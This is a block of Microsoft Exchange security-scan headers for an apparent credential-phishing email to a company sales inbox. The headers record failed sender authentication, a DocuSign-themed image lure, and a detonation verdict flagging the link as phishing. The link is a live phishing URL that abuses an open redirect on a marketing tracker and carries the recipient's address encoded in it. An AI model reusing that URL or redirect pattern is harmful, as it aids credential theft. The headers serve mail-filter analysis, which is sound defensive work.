                                                                                                                          X-MS-Exchange-Organization-OrderedPrecisionLatencyInProgressLSRV=BN1PR12CA0012.namprd12.prod.outlook.com:TOTAL-FE=0.018|;2024-02-02T18:00:18.366Z
                                                                                                                          X-MS-Exchange-Organization-MessageLatencySRV=BN1PEPF00004682.namprd03.prod.outlook.com:TOTAL-FETI=0.141|SMR-PEN=0.134(RENV=0.062(SMRRC=0.036(SMRRC-TenantAttributionAndInboundConnectorAgent=0.034 ))|REOH=0.071(SMREH=0.057(SMREH-Protocol Filter Agent=0.056)))
                                                                                                                          X-MS-Exchange-Forest-ArrivalHubServerSJ0PR18MB3803.namprd18.prod.outlook.com
                                                                                                                          X-MS-Exchange-Organization-AuthSourceBN1PEPF00004682.namprd03.prod.outlook.com
                                                                                                                          X-MS-Exchange-Organization-AuthAsAnonymous
                                                                                                                          X-MS-Exchange-Organization-FromEntityHeaderInternet
                                                                                                                          X-MS-Exchange-Organization-MessageScopec881855c-9463-4194-aa38-7e06dec84417
                                                                                                                          X-MS-Exchange-Forest-MessageScopec881855c-9463-4194-aa38-7e06dec84417
                                                                                                                          X-MS-Exchange-Organization-Antispam-ProtocolFilterHub-ScanContextProtocolFilterHub:SmtpOnEndOfData
                                                                                                                          X-MS-Office365-Filtering-Correlation-Id22efba12-825e-4abd-0e9a-08dc2418d0ee
                                                                                                                          X-MS-Exchange-Organization-P2SenderDisplayNamePIIH101(qczEoQjh2MCtizD1D927hOogjnhGvYHgzc7dVKeNti0=)
                                                                                                                          X-MS-Exchange-Organization-P2SenderPII<PII:H101(31pOZG5gcpamwNrQ0wGnANOJdEXDGgD1LuEPpJVeiXo=)>@atriumurbana.com
                                                                                                                          X-MS-Exchange-Organization-Antispam-AuthResults{"SpfDomain":"atriumurbana.com","SpfAuthStatus":"SoftFail","DkimAuthStatus":"None","DkimSubStatus":"None","DmarcAuthStatus":"Fail","DmarcAction":"None","ArcAuthStatus":"0","ArcSubStatus":"0"}
                                                                                                                          X-MS-Exchange-Organization-PFAHub-Total-Message-Size840011
                                                                                                                          X-MS-Exchange-Organization-OriginalSize840011
                                                                                                                          X-MS-Exchange-Organization-HygienePolicyPremium
                                                                                                                          X-MS-Exchange-Organization-ReplicationInfoReplicaId=1bb477cd-79cf-7004-2754-4dd11824dc08;ReplicatingServerFqdn=PH0PR18MB3798.namprd18.prod.outlook.com
                                                                                                                          X-MS-Exchange-Organization-PhishSim-Rules-Execution-Historycc19cbe8-ba5c-4cc3-8fc8-4e683f7a4516
                                                                                                                          X-MS-Exchange-Organization-Antispam-PreContentFilter-PolicyLoadTimePSOSUB:107;PSOSUBLOAD:105;PSOSUBRUN:0;PSOSUBCOUNT:1;SMORES:79;SMORESLOAD:78;SMORESRUN:0;SMORESCOUNT:0;SAORES:264;SAORESLOAD:67;SLORES:54;APORES:67;APORESLOAD:66;RSORES:67;SLORESLOAD:52;SLORESRUN:0;SLORESCOUNT:1
                                                                                                                          X-MS-Exchange-Organization-MessageFingerprintEF37F0DF.A0172C19.A5611F1B.24EFEA88.200E6
                                                                                                                          X-MS-Exchange-Organization-AttachmentDetailsInfo-ChunkCount1
                                                                                                                          X-MS-Exchange-Organization-AttachmentDetailsInfo-0[{"ID":0,"FS":608073,"SHA256":"ff6167457c7cd79c7b917fce733c3005c2c7107094f2d1add7c90b2e9a199027","HFH":"/2FnRXx815x7kX/OczwwBcLHEHCU8tGt18kLLpoZkCc=","FE":"png","AF":2048,"AFT":"{784:\"thumbnail_docusign.PNG\",789:\"png\"}","AFT2":"{784:\"thumbnail_docusign.PNG\",789:\"png\",2919:1735,2920:1824,2921:32,2923:1}","FPR":{"IF0":"IF0_00FF1AFFF1AFFFF1AFFFFB1A7FFFBF007FFFBF0"}}]
                                                                                                                          X-MS-Exchange-Organization-UrlMinimumDomainAgecommander1.com#3747
                                                                                                                          X-MS-Exchange-Organization-URLFeatureReduction27;2;0;24;0;0;0;0;22;3;2;10000000;0;0;0;1
                                                                                                                          X-MS-Exchange-Organization-PersistedUrlCount2
                                                                                                                          X-MS-Exchange-Organization-EmailFingerprints{"VA10":"VA10_F4BD9B8A4E1085B3B0F1C5B6BA0BB999C0C91C1308FDF8E51D82DA5AA8786E87","VA2":"VA2_5A78C22B6BEA30E0FE38E02357FC24EA1225FD75B13406DD3F439BBA654B5668","VA1":"VA1_6C9A4540EEE875D484DDFC68739C89CD80C6301EF1730DD2669130E6C471DFA6","VA0":"VA0_95437CA1E1C650D4A1F1667218BC3A4787EB1BDD380F925EBAC82C38E503260E","VA3":"VA3_EF3730DF.A0172C19.65511F1B.24EFEA88.347E2EE3"}
                                                                                                                          X-MS-Exchange-Organization-FeatureTable{255:0,256:0,259:3747,260:4018,261:0,262:0,341:0,342:0,343:0,344:0,345:0,346:0,347:0,348:0,349:0,350:0,351:0,352:0,355:982,356:908,357:999,358:351,384:"atriumurbana.com",385:"atriumurbana.com",386:"True",387:"True",421:20,422:8,423:20,424:8,425:22,426:3,427:22,428:3,429:11,430:1,452:1,453:1,454:"869C16B7@dudick.com",455:"UNK",457:70,458:260,459:65,460:1020202,461:247,462:4974,463:247,464:4974,501:3,502:7,503:3,504:7,506:3,507:3,508:"none",509:"atriumurbana.com",510:"atriumurbana.com",511:"none",512:405,601:85,602:21,603:0,604:0,651:2,653:1,656:1,666:239,667:426826656,668:0,669:15,702:"None",703:"importan;notif",721:"3.02",722:"2.58",723:1,725:9,727:6,728:33,733:256,735:"2.9",740:1,741:1,742:1,743:3,748:"notif;action",749:"Latn",758:"EF3730DF.A0172C19.65511F1B.24EFEA88.200E8",781:1,782:22,824:27,825:2,827:24,832:22,833:3,834:2,838:"p:6;a:1;img:1;html:2;body:1;div:2;span:2",841:1,844:1,845:0,849:1,1010:0,1011:"C088B727;537FE21;",1028:3663,1029:3543,1030:245,1031:119,1032:3663,1033:3543,1034:245,1035:119,1051:-1,1052:-1,1053:-1,1054:-1,1101:"0.005",1103:0,1104:0,1106:0,1107:30574,1401:0,1402:0,1403:0,1404:0,1405:0,1406:0,1407:87,1408:87,1409:93,1410:101,1411:93,1412:101,1417:0,1418:2334,1423:1,1424:651241}
                                                                                                                          X-MS-Exchange-Organization-Antispam-PreContentFilter-ScanContextCategorizerOnSubmitted;CategorizerOnResolved
                                                                                                                          X-MS-Exchange-Organization-AVScannedByV2true
                                                                                                                          X-MS-Exchange-Organization-AVScanCompletetrue
                                                                                                                          X-MS-Exchange-Organization-TDNA-ReputationBAD_TDNA_CON_SPAM
                                                                                                                          X-MS-Exchange-Organization-UrlSelected1
                                                                                                                          X-MS-Exchange-Organization-UrlLogged1
                                                                                                                          X-MS-Exchange-Organization-EmailFingerprintsDetailsInfo-ChunkCount1
                                                                                                                          X-MS-Exchange-Organization-EmailFingerprintsDetailsInfo-0[{"Type":"VA10","Val":"VA10_F4BD9B8A4E1085B3B0F1C5B6BA0BB999C0C91C1308FDF8E51D82DA5AA8786E87","Func":"SHA256","FF":0,"PD":{}},{"Type":"VA2","Val":"VA2_5A78C22B6BEA30E0FE38E02357FC24EA1225FD75B13406DD3F439BBA654B5668","Func":"SHA256","FF":0,"PD":{}},{"Type":"VA1","Val":"VA1_6C9A4540EEE875D484DDFC68739C89CD80C6301EF1730DD2669130E6C471DFA6","Func":"SHA256","FF":0,"PD":{}},{"Type":"VA0","Val":"VA0_95437CA1E1C650D4A1F1667218BC3A4787EB1BDD380F925EBAC82C38E503260E","Func":"SHA256","FF":0,"PD":{}},{"Type":"VA3","Val":"VA3_EF3730DF.A0172C19.65511F1B.24EFEA88.347E2EE3","Func":"SHA256","FF":0,"PD":{}}]
                                                                                                                          X-MS-Exchange-Organization-OffboxClassificationInfo{"EndpointId":"DCS","OperationIds":{},"OperationStates":{},"Classifiers":[],"RuleInfos":[],"CorrelationId":"7af359d3-f8d7-4bac-bf3f-1041729fb238","TotalClassificationLatency":"00:00:00"}
                                                                                                                          X-MS-Exchange-Organization-ExternalRoutingTopologyAnalysis
                                                                                                                          X-MS-Exchange-Organization-Recipient-Limit-VerifiedTrue
                                                                                                                          X-MS-Exchange-Organization-TotalRecipientCount1
                                                                                                                          X-MS-Exchange-Organization-ASDirectionalityType1
                                                                                                                          X-MS-Exchange-Organization-HVERecipientsForked1.0
                                                                                                                          X-MS-Exchange-Organization-SafeLinksPolicy-BIPBuilt-In Protection Policy
                                                                                                                          X-MS-Exchange-Organization-SafeAttachmentPolicy-BIPBuilt-In Protection Policy
                                                                                                                          X-MS-Exchange-Organization-SafeAttachmentPolicyBuilt-In Protection Policy
                                                                                                                          X-MS-Exchange-Organization-SafeLinksPolicyKnowbe4 HD334705
                                                                                                                          X-MS-Exchange-Organization-SafeAttachmentPolicy-Enable1
                                                                                                                          X-MS-Exchange-Organization-SafeLinksPolicy-EnableSafeLinksForEmail1
                                                                                                                          X-MS-Exchange-Organization-SafeLinksPolicy-EnableSafeLinksForInternalSenders1
                                                                                                                          X-MS-Exchange-Organization-Boomerang-VerdictNone
                                                                                                                          X-MS-Exchange-Organization-MetadataFeatureTable{756:0,757:0,1010:0,1011:"C088B727;537FE21;",1036:"399486"}
                                                                                                                          X-MS-Exchange-AtpMessagePropertiesSA|SL
                                                                                                                          X-MS-Exchange-Organization-IsKnownDomain1
                                                                                                                          X-MS-Exchange-Organization-SenderIntelligence-P2SenderOrgDomainTenantId{"stringProperties":{"_STATUS":"Success"},"numericProperties":{"EntityFound":1}}
                                                                                                                          X-MS-Exchange-Organization-SenderIntelligence-P2Sender{"stringProperties":{"Watermark":"2024/01/31","FirstSeen_30D":"2024-01-01","LastSeen_30D":"2024-01-25","AvgInbound_1D":"378.07","AvgOutbound_1D":"739.1","ListDisplayNames_30D":"","VolumeBucket":"","_STATUS":"Success"},"numericProperties":{"SenderFlagRatio":110,"SenderForwardRatio":110,"SenderMarkAsJunkRatio":3299,"SenderMarkAsPhishRatio":15395,"SenderMarkAsUnReadRatio":330,"SenderMoveToJunkRatio":3629,"SenderReadRatio":18034,"SenderReplyRatio":4179,"TDNA_050Count_AuthPassed":1,"TDNA_050_90Count_AuthPassed":1,"TDNA_100Count_AuthPassed":1,"TDNA_100_90Count_AuthPassed":1,"MaxLenZero_AuthPassed":172,"MaxMailsSent_AuthPassed":7992,"TotalDaysSentLast135_AuthPassed":1,"TotalDaysSentLast14_AuthPassed":1,"TotalDaysSentLast180_AuthPassed":1,"TotalDaysSentLast7_AuthPassed":0,"TotalDaysSentLast90_AuthPassed":1,"TotalMailsSentLast135_AuthPassed":7992,"TotalMailsSentLast14_AuthPassed":7992,"TotalMailsSentLast180_AuthPassed":7992,"TotalMailsSentLast7_AuthPassed":0,"TotalMailsSentLast90_AuthPassed":7992,"MedianMailsSent_AuthPassed":0,"MedianMailsSentLast45Days_AuthPassed":0,"MedianMailsSentLast90Days_AuthPassed":0,"FirstQ_AuthPassed":0,"SecondQ_AuthPassed":0,"ThirdQ_AuthPassed":0,"AvgMailSentPerDayLast1Week_AuthPassed":0,"AvgMailSentPerDayLast2Week_AuthPassed":57086,"AvgMailSentPerDayLast45Days_AuthPassed":17760,"Avg_Rcpt_Ratio_AuthPassed":5289,"Bin1_Mailcount_Ratio_Avg_AuthPassed":30,"Dkim_Mailcount_Ratio_Avg_AuthPassed":1,"Ip_Mailcount_Ratio_Avg_AuthPassed":560,"Spf_Mailcount_Ratio_Avg_AuthPassed":1,"TDNA_050Count_AuthNotPassed":2,"TDNA_050_90Count_AuthNotPassed":2,"TDNA_100Count_AuthNotPassed":1,"TDNA_100_90Count_AuthNotPassed":1,"MaxLenZero_AuthNotPassed":172,"MaxMailsSent_AuthNotPassed":969,"TotalDaysSentLast135_AuthNotPassed":1,"TotalDaysSentLast14_AuthNotPassed":1,"TotalDaysSentLast180_AuthNotPassed":1,"TotalDaysSentLast7_AuthNotPassed":0,"TotalDaysSentLast90_AuthNotPassed":1,"TotalMailsSentLast135_AuthNotPassed":969,"TotalMailsSentLast14_AuthNotPassed":969,"TotalMailsSentLast180_AuthNotPassed":969,"TotalMailsSentLast7_AuthNotPassed":0,"TotalMailsSentLast90_AuthNotPassed":969,"MedianMailsSent_AuthNotPassed":0,"MedianMailsSentLast45Days_AuthNotPassed":0,"MedianMailsSentLast90Days_AuthNotPassed":0,"FirstQ_AuthNotPassed":0,"SecondQ_AuthNotPassed":0,"ThirdQ_AuthNotPassed":0,"AvgMailSentPerDayLast1Week_AuthNotPassed":0,"AvgMailSentPerDayLast2Week_AuthNotPassed":6920,"AvgMailSentPerDayLast45Days_AuthNotPassed":2153,"Avg_Rcpt_Ratio_AuthNotPassed":5137,"Bin1_Mailcount_Ratio_Avg_AuthNotPassed":287,"Dkim_Mailcount_Ratio_Avg_AuthNotPassed":206,"Ip_Mailcount_Ratio_Avg_AuthNotPassed":1903,"Spf_Mailcount_Ratio_Avg_AuthNotPassed":292,"TotalEmailsSent_30D":33515,"TotalDaysSent_30D":21,"SenderScore":691,"MoveToJunkCount":33,"P2SenderReputation":0,"TotalCountSum24h":5366,"TotalCountSum1h":5329,"EntityFound":1}}
                                                                                                                          X-MS-Exchange-Organization-Antispam-AnalystFeatureFilter-ScanContextCategorizerOnResolved
                                                                                                                          X-MS-Exchange-Organization-Rules-Execution-History137eaf2e-ad5f-4dad-bd41-a4ebef147db3%%%8a4e8bfe-ff94-4d43-8691-8f8aec2658f2%%%4560dc46-9a1b-4376-a62a-d5455d3addc1%%%00bc84b3-143b-4271-bd16-44e926d6fe40%%%36d7d03e-e21f-4386-aa93-896a0ee68535%%%0b4c40af-1c87-4bb9-8527-188d7e917d7c%%%600dc323-feb9-4401-b739-0250e780e850%%%b341d41d-6c5b-4e4e-a7a8-de09ecf182fd%%%aad950f1-105f-4d0a-9c9a-5da238071794%%%094ea3c2-3f09-4377-9041-37b827e6d7a5%%%d562fab1-0d70-4039-b568-03d22b50cf5a%%%06b45934-4586-4398-9c54-1e085456b7f3%%%1897ce2d-dfa6-426b-aadc-2eb99b74b268%%%bf79ae4a-10fd-4ac9-b245-03dd95c0fbf1%%%2add1510-cdc2-4503-bb4f-73cd398ea76c%%%7bb1bb37-9752-4a43-8c1d-2465bffc54a2%%%e2bf49c3-126c-4382-a72e-a342447a30c1
                                                                                                                          X-MS-Exchange-Organization-SCL-1
                                                                                                                          X-MS-Exchange-Organization-Antispam-TenantMessageRuleInfoScl:-1;RuleId:b341d41d-6c5b-4e4e-a7a8-de09ecf182fd
                                                                                                                          X-MS-Exchange-Organization-Rules-Execution-Logb341d41d-6c5b-4e4e-a7a8-de09ecf182fd
                                                                                                                          X-MS-Exchange-Organization-RuleName-Execution-LogQnlwYXNzIFNwYW0gRmlsdGVyIDA1MDYyMDIx
                                                                                                                          X-MS-Exchange-Forest-RulesExecutedSJ0PR18MB3803
                                                                                                                          X-MS-Exchange-Organization-RulesExecutedSJ0PR18MB3803
                                                                                                                          X-MS-Exchange-Organization-SenderRecipientCommunicationStateUNK
                                                                                                                          X-MS-Exchange-Organization-IncludeInSlaFalse:Sonar
                                                                                                                          X-MS-Exchange-Organization-PersistedUrlInfoCount1
                                                                                                                          X-MS-Exchange-Organization-Antispam-ContentFilter-ScanContextCategorizerOnResolved
                                                                                                                          X-MS-Exchange-Organization-CommunicationStateSummaryUNK
                                                                                                                          X-MS-Exchange-Organization-FirstContactSummaryST=0;MRG=0;EXT=0;UN=0;ORCT=1;EV=0;FC=0;NESI=0;NES=0;ESTI=0;EST=0;INS=0;MP=0;UD=0;QE=0;ERR=1
                                                                                                                          X-MS-Exchange-Organization-CFA-UserOption0
                                                                                                                          X-MS-Exchange-Organization-CompAuthcompauth=none reason=405
                                                                                                                          X-MS-Exchange-Organization-ContainsAttachmentstrue
                                                                                                                          X-MS-Exchange-Organization-Feature-Long0 201:1046 202:381 203:1 205:9 207:6 208:33 213:256 215:792 235:2 236:7 238:3 241:1 242:1 243:1 244:3 246:1 247:1 248:3 252:1 255:1 256:1 257:22 1004:None 1005:importan;notif 1006:notif;action 1007:Latn 1014:none 1015:atriumurbana.com 1020:atriumurbana.com 1030:atriumurbana.com 1034:869C16B7@dudick.com 1035:atriumurbana.com
                                                                                                                          X-MS-Exchange-Organization-ExtractionTagsSubjectdudick SystemDesk Important Crediential Notification 1
                                                                                                                          X-MS-Exchange-Organization-ExtractionTagsFromdudick Authentication <rmcdermand@atriumurbana.com>
                                                                                                                          X-MS-Exchange-Organization-ExtractionTagsSubjectNormalizeddudlck systerndesk lrnportant credlentlal notlflcatlon l
                                                                                                                          X-MS-Exchange-Organization-ExtractionTags1IMG;SUB64
                                                                                                                          X-MS-Exchange-Organization-ExtractionTagsURLFoundURL
                                                                                                                          X-MS-Exchange-Organization-ATPDetonationContextEmail_EnterpriseATP_Mailflow
                                                                                                                          X-MS-Exchange-Organization-AtpDetonationPriority1
                                                                                                                          X-MS-Exchange-Organization-ATPScanUrls1
                                                                                                                          X-MS-Exchange-Organization-ATPCustomPipelineScanCompleteActionRouteBack
                                                                                                                          X-MS-Exchange-Organization-PriorityRequestNormal
                                                                                                                          X-MS-Exchange-Organization-ATPSafeLinks-UrlSidelineSafeLinksMFInlineDet
                                                                                                                          X-MS-Exchange-Organization-RunDetonationScanUrl
                                                                                                                          X-MS-Exchange-Organization-ATPDetonation-SonarSubmissionId717659ef-f4c1-ee11-bffa-98f2b3c42f82
                                                                                                                          X-MS-Exchange-Organization-ATPDetonationLatencyUrl:13218
                                                                                                                          X-MS-Exchange-Organization-XMSExchangeOrganizationATPComponentLatenciesTDF=0;OCRL=93;SL_SS=140;SL=1109;SSL_GS=468;SSL=12940;PL=0
                                                                                                                          X-MS-Exchange-Organization-XMSExchangeOrganizationATPPendingLatencyItems
                                                                                                                          X-MS-Exchange-Organization-Persisted-Urls-ChunkCount2
                                                                                                                          X-MS-Exchange-Organization-Persisted-Urls-0[{"ID":1,"OU":"https://sushishop.commander1.com/c3?firsttime=1&tcs=2478&chn=emailing&src=neolane&cmp=20231127_email_relance_app30_befr&cty=be&med=actu&url=//galeonconstruction.com/nin/niit#c2FsZXNAZHVkaWNrLmNvbQ==","U":"https://sushishop.commander1.com/c3?firsttime=1&tcs=2478&chn=emailing&src=neolane&cmp=20231127_email_relance_app30_befr&cty=be&med=actu&url=//galeonconstruction.com/nin/niit#c2FsZXNAZHVkaWNrLmNvbQ==","IAR":false,"LI":{"BF":2,"SI":-1,"EndIndex":-1},"SRCI":1,"IU":null,"NU":"sushishop.commander1.com/c3?firsttime=1&tcs=2478&chn=emailing&src=neolane&cmp=20231127_email_relance_app30_befr&cty=be&med=actu&url=//galeonconstruction.com/nin/niit#c2FsZXNAZHVkaWNrLmNvbQ==","UFT":"{101:27,102:2,105:24,108:3,110:10,111:14,112:2,114:10,115:9,116:1,118:9,119:10,121:9,122:3,123:1,125:3,128:2,131:67623,135:\"446E22FD,228DB3FC,2653B046,C0016468,11A17E18,2853B36C,C70EE6F7,A5FC4928,F50B273A,B675BF44,AD579C05,760A7AFC,360326CC,9540F96E,6789BF1B\",142:0,146:\"sushishop.commander1.com\",201:3747,202:124,203:270,204:4018,205:86,206:13,207:243,208:153,209:241,210:151,211:239,212:149,213:67,214:10,215:59,216:6,217:59,218:6,219:86,220:13,221:40,222:7,223:40,224:7,225:40,226:7,227:40,228:7,229:67,230:10,231:155,232:6,233:154,234:99,235:87,236:13,237:67,238:10,239:59,240:6,241:59,242:6,243:86,244:13,245:28,246:2,247:83,248:3,249:0,250:0,251:0,252:0}","UFT2":"{101:27,102:2,105:24,108:3,110:10,111:14,112:2,114:10,115:9,116:1,118:9,119:10,121:9,122:3,123:1,125:3,128:2,131:67623,142:0,146:\"sushishop.commander1.com\",150:1,153:1,166:1,167:1,170:1,171:1,172:1,173:1,180:8,181:1,182:138,183:3,184:\"sushishop.*.*,*.commander1.*,*.*.com\",185:\"*.commander1.com,sushishop.*.com,sushishop.commander1.*\",186:\"9.*.*,*.10.*,*.*.3\",187:\"*.commander1.com,sushishop.*.com,sushishop.commander1.*\",18
                                                                                                                          X-MS-Exchange-Organization-Persisted-Urls-18:2,189:24,201:3747,202:124,203:270,204:4018,205:86,206:13,207:243,208:153,209:241,210:151,211:239,212:149,213:67,214:10,215:59,216:6,217:59,218:6,219:86,220:13,221:40,222:7,223:40,224:7,225:40,226:7,227:40,228:7,229:67,230:10,231:155,232:6,233:154,234:99,235:87,236:13,237:67,238:10,239:59,240:6,241:59,242:6,243:86,244:13,245:28,246:2,247:83,248:3,249:0,250:0,251:0,252:0,1501:\"86;13;243;153;241;151;239;149;67;10;59;6;59;6;86;13;40;7;40;7;40;7;40;7;67;10;155;6;154;99;87;13;67;10;59;6;59;6;86;13;28;2;83;3;0;0\"}","DPD":{"UF":"17367296","CH":"7582224675752807609","SCHM":"Https","CNT":"1","MLFP":"UESELV3=11;UMEPV2=670;UEBUFV0=3590;UMEPV2=670","SL":"1","LOG":"1","V":"PHS","FC":"URLD","B64NDU":"c3VzaGlzaG9wLmNvbW1hbmRlcjEuY29tL2MzP2ZpcnN0dGltZT0xJnRjcz0yNDc4JmNobj1lbWFpbGluZyZzcmM9bmVvbGFuZSZjbXA9MjAyMzExMjdfZW1haWxfcmVsYW5jZV9hcHAzMF9iZWZyJmN0eT1iZSZtZWQ9YWN0dSZ1cmw9Ly9nYWxlb25jb25zdHJ1Y3Rpb24uY29tL25pbi9uaWl0I2MyRnNaWE5BWkhWa2FXTnJMbU52YlE9PQ==","CID":"2931"},"PROC":[]},{"ID":2,"OU":"thumbnail_docusign.PNG","U":"http://thumbnail_docusign.png/","IAR":false,"LI":{"BF":2,"SI":-1,"EndIndex":-1},"SRCI":1,"IU":null,"NU":"thumbnail_docusign.png","UFT":"{101:23,102:1,105:22,108:3,110:18,111:22,112:2,114:18,116:1,119:18,121:15,122:3,123:1,125:3,131:10000000,135:\"6968167E,64BED96B,2BBC35,CB510F7A,2238C15A,5E0BB489,801BD3DB,23016F6E,3B0E94D4,9E31FD0F,E92DA698,93E427EC,E108F926,6D1B02FC,1AEB9C87\",142:0,146:\"thumbnail_docusign.png\"}","UFT2":"{101:23,102:1,105:22,108:3,110:18,111:22,112:2,114:18,116:1,119:18,121:15,122:3,123:1,125:3,131:10000000,142:0,146:\"thumbnail_docusign.png\",150:1,153:1,166:1,184:\"thumbnail_docusign.*,*.png\",186:\"18.*,*.3\",188:1,189:22,190:1}","DPD":{"UF":"17180459008","CH":"7139516886877601229","SCHM":"Http","CNT":"1","LOG":"1"},"PROC":[]}]
                                                                                                                          X-MS-Exchange-Organization-ATPScanUrlInfo-ChunkCount1
                                                                                                                          X-MS-Exchange-Organization-ATPScanUrlInfo-0[{"CanonicalizedUrl":"https:\/\/sushishop.commander1.com\/c3?firsttime=1&tcs=2478&chn=emailing&src=neolane&cmp=20231127_email_relance_app30_befr&cty=be&med=actu&url=\/\/galeonconstruction.com\/nin\/niit#c2fszxnazhvkawnrlmnvbq==","DynamicProperties":[{"Key":"NU","Value":"sushishop.commander1.com\/c3?firsttime=1&tcs=2478&chn=emailing&src=neolane&cmp=20231127_email_relance_app30_befr&cty=be&med=actu&url=\/\/galeonconstruction.com\/nin\/niit#c2FsZXNAZHVkaWNrLmNvbQ=="},{"Key":"Resub","Value":"None"}],"urlData":[{"Key":"<U>","Value":"https:\/\/sushishop.commander1.com\/c3?firsttime=1&tcs=2478&chn=emailing&src=neolane&cmp=20231127_email_relance_app30_befr&cty=be&med=actu&url=\/\/galeonconstruction.com\/nin\/niit#c2FsZXNAZHVkaWNrLmNvbQ=="},{"Key":"OH","Value":"16440646087356072766"},{"Key":"OSH","Value":"kzcRNu1rksyyS72KpPa84jde4Oi+WuOEXIsmZKF4pL4="},{"Key":"HN","Value":"sushishop.commander1.com"},{"Key":"BDN","Value":"commander1.com"},{"Key":"H","Value":"2268946961268669854"},{"Key":"SRCI","Value":1},{"Key":"<RCPT>","Value":"sales@dudick.com"},{"Key":"SE","Value":"https"},{"Key":"SS","Value":true},{"Key":"V","Value":1},{"Key":"CEV","Value":1},{"Key":"VS","Value":2},{"Key":"FUV","Value":1},{"Key":"C","Value":100000},{"Key":"VC","Value":2},{"Key":"<RU>","Value":""},{"Key":"<FU>","Value":"https:\/\/sushishop.commander1.com\/c3?firsttime=1&tcs=2478&chn=emailing&src=neolane&cmp=20231127_email_relance_app30_befr&cty=be&med=actu&url=\/\/galeonconstruction.com\/nin\/niit#c2FsZXNAZHVkaWNrLmNvbQ=="},{"Key":"SId","Value":"717659ef-f4c1-ee11-bffa-98f2b3c42f82"},{"Key":"ET","Value":""},{"Key":"DN","Value":"Phish_StaticURL_KnownBadImageLure_A"},{"Key":"DE","Value":""},{"Key":"ST","Value":"00:00:12.1563509"},{"Key":"DS","Value":3},{"Key":"DSR","Value":0}]}]
                                                                                                                          X-MS-Exchange-Organization-ATPDetonation-SonarData-ChunkCount2
                                                                                                                          X-MS-Exchange-Organization-ATPDetonation-SonarData-0{"SEC":{"EPTYPE":2,"SUBREG":"NAM","DETREG":"NAM","AT":638424936287214979,"CT":638424936419404157,"ST":638424936299558906,"EMAT":0,"EA":1,"DC":0,"URIS":"eyJCbG9iVG9rZW4iOiJodHRwczovL3NhbmFtMTFvbmVjeWJlci5ibG9iLmNvcmUud2luZG93cy5uZXQvb25lY3liZXJibG9iP3N2PTIwMTgtMDMtMjgmc3I9YyZzaWc9enN6SzRmS01iZXdxMjAlMkZSRWFGWkM4U1FNczRlMUdZUXZ0TWZKUWtDSHdnJTNEJnNlPTIwMjQtMDItMDVUMTglM0EwMCUzQTI4WiZzcD13bCIsIlF1ZXVlVG9rZW4iOiJodHRwczovL3NhbmFtMTFvbmVjeWJlci5xdWV1ZS5jb3JlLndpbmRvd3MubmV0L29uZWN5YmVycXVldWU/c3Y9MjAxOC0wMy0yOCZzaWc9UHVFQUpOOUlkNWtac0dPZ1NvaUJaT1RYTHdOSzZyYXpCZDNYbHFZWWJHNCUzRCZzZT0yMDI0LTAyLTA1VDE4JTNBMDAlM0EyOFomc3A9YSIsIkJhZCI6IlN1bW1hcnk7T25lQ3liZXI7U2NyZWVuU2hvdHM7OyIsIkdvb2QiOiIiLCJFcnJvciI6IiIsIlNUIjoxfQ==","ACSC":"{\"SubmissionInfo\":{\"SubmissionToken\":\"PFRva2VuIEVuZHBvaW50PSJodHRwczovL1NONFNOQTA1VFAyOTAuZW9wLXNuYTA1LnByb2QucHJvdGVjdGlvbi5vdXRsb29rLmNvbS9zb25hcmFwaS8iIElkPSI3MTc2NTllZi1mNGMxLWVlMTEtYmZmYS05OGYyYjNjNDJmODIiIFJvbGU9IlN1Ym1pdHRlciIgVG9rZW5UeXBlPSJTdWJtaXNzaW9uVG9rZW4iIFNpZ25hdHVyZT0iS3dsYWdTNlA2SUhZRDhFZnhEczhrSGRUVm94QlRERHJOVCtJOHRKOENxd01Rbk1nRDUyN1MyTU9SemJMNkV6NUthZFZNb2VFNzB5VHFINzBVQzJCcEE9PSIgU2lnbmF0dXJlVmVyc2lvbj0iVmVyc2lvbjIxIiAvPg\",\"Identity\":\"https://nam-sonar.atp.protection.outlook.com/sonarapi?connectionkeepalive=false\"}}","MS":2,"ES":0,"OSHES":"True","MT":{"MT":0,"TF":0,"TH":0,"CTH":0,"STO":0,"NSS":1}},"MsgDetail":{"NwMsgId":"22efba12-825e-4abd-0e9a-08dc2418d0ee","MsgId":"<eabc18ba-6851-1439-7a09-7b942df5ee7c@atriumurbana.com>","DCxt":"Email_EnterpriseATP_Mailflow","DCxtHints":[],"Sub-Sc":"Mailflow_Url","TId":"5573221e-1079-4e51-a604-13d46e958b70"},"SubDetail":{"MSG":{"ID":"22efba12-825e-4abd-0e9a-08dc2418d0ee","Meta":{}},"ATCH":{},"URL":{"https://sushishop.commander1.com/c3?firsttime=1&tcs=2478&chn=emailing&src=neolane&cmp=202311
                                                                                                                          X-MS-Exchange-Organization-ATPDetonation-SonarData-127_email_relance_app30_befr&cty=be&med=actu&url=//galeonconstruction.com/nin/niit#c2FsZXNAZHVkaWNrLmNvbQ==":{"USC":1,"ID":"https://sushishop.commander1.com/c3?firsttime=1&tcs=2478&chn=emailing&src=neolane&cmp=20231127_email_relance_app30_befr&cty=be&med=actu&url=//galeonconstruction.com/nin/niit#c2FsZXNAZHVkaWNrLmNvbQ==","Meta":{}}}},"DetDetail":{"MSG":{"ID":"22efba12-825e-4abd-0e9a-08dc2418d0ee","PH":"","DR":{"SV":5,"V":0,"VC":0,"VSC":0}},"ATCH":{},"URL":{"https://sushishop.commander1.com/c3?firsttime=1&tcs=2478&chn=emailing&src=neolane&cmp=20231127_email_relance_app30_befr&cty=be&med=actu&url=//galeonconstruction.com/nin/niit#c2FsZXNAZHVkaWNrLmNvbQ==":{"H":"2268946961268669854","NU":"sushishop.commander1.com/c3?firsttime=1&tcs=2478&chn=emailing&src=neolane&cmp=20231127_email_relance_app30_befr&cty=be&med=actu&url=//galeonconstruction.com/nin/niit#c2FsZXNAZHVkaWNrLmNvbQ==","SRCI":1,"NRU":"sushishop.commander1.com/c3","<RCPT>":"sales@dudick.com","ID":"https://sushishop.commander1.com/c3?firsttime=1&tcs=2478&chn=emailing&src=neolane&cmp=20231127_email_relance_app30_befr&cty=be&med=actu&url=//galeonconstruction.com/nin/niit#c2FsZXNAZHVkaWNrLmNvbQ==","SS":true,"PH":"","DR":{"RU":[],"FU":"https://sushishop.commander1.com/c3?firsttime=1&tcs=2478&chn=emailing&src=neolane&cmp=20231127_email_relance_app30_befr&cty=be&med=actu&url=//galeonconstruction.com/nin/niit#c2FsZXNAZHVkaWNrLmNvbQ==","FV":4,"SV":2,"V":4,"VC":2,"VSC":1,"Sha256AsString":"kzcRNu1rksyyS72KpPa84jde4Oi+WuOEXIsmZKF4pL4=","DN":"Phish_StaticURL_KnownBadImageLure_A","SMN":"SN4SNA05TP290","C":10000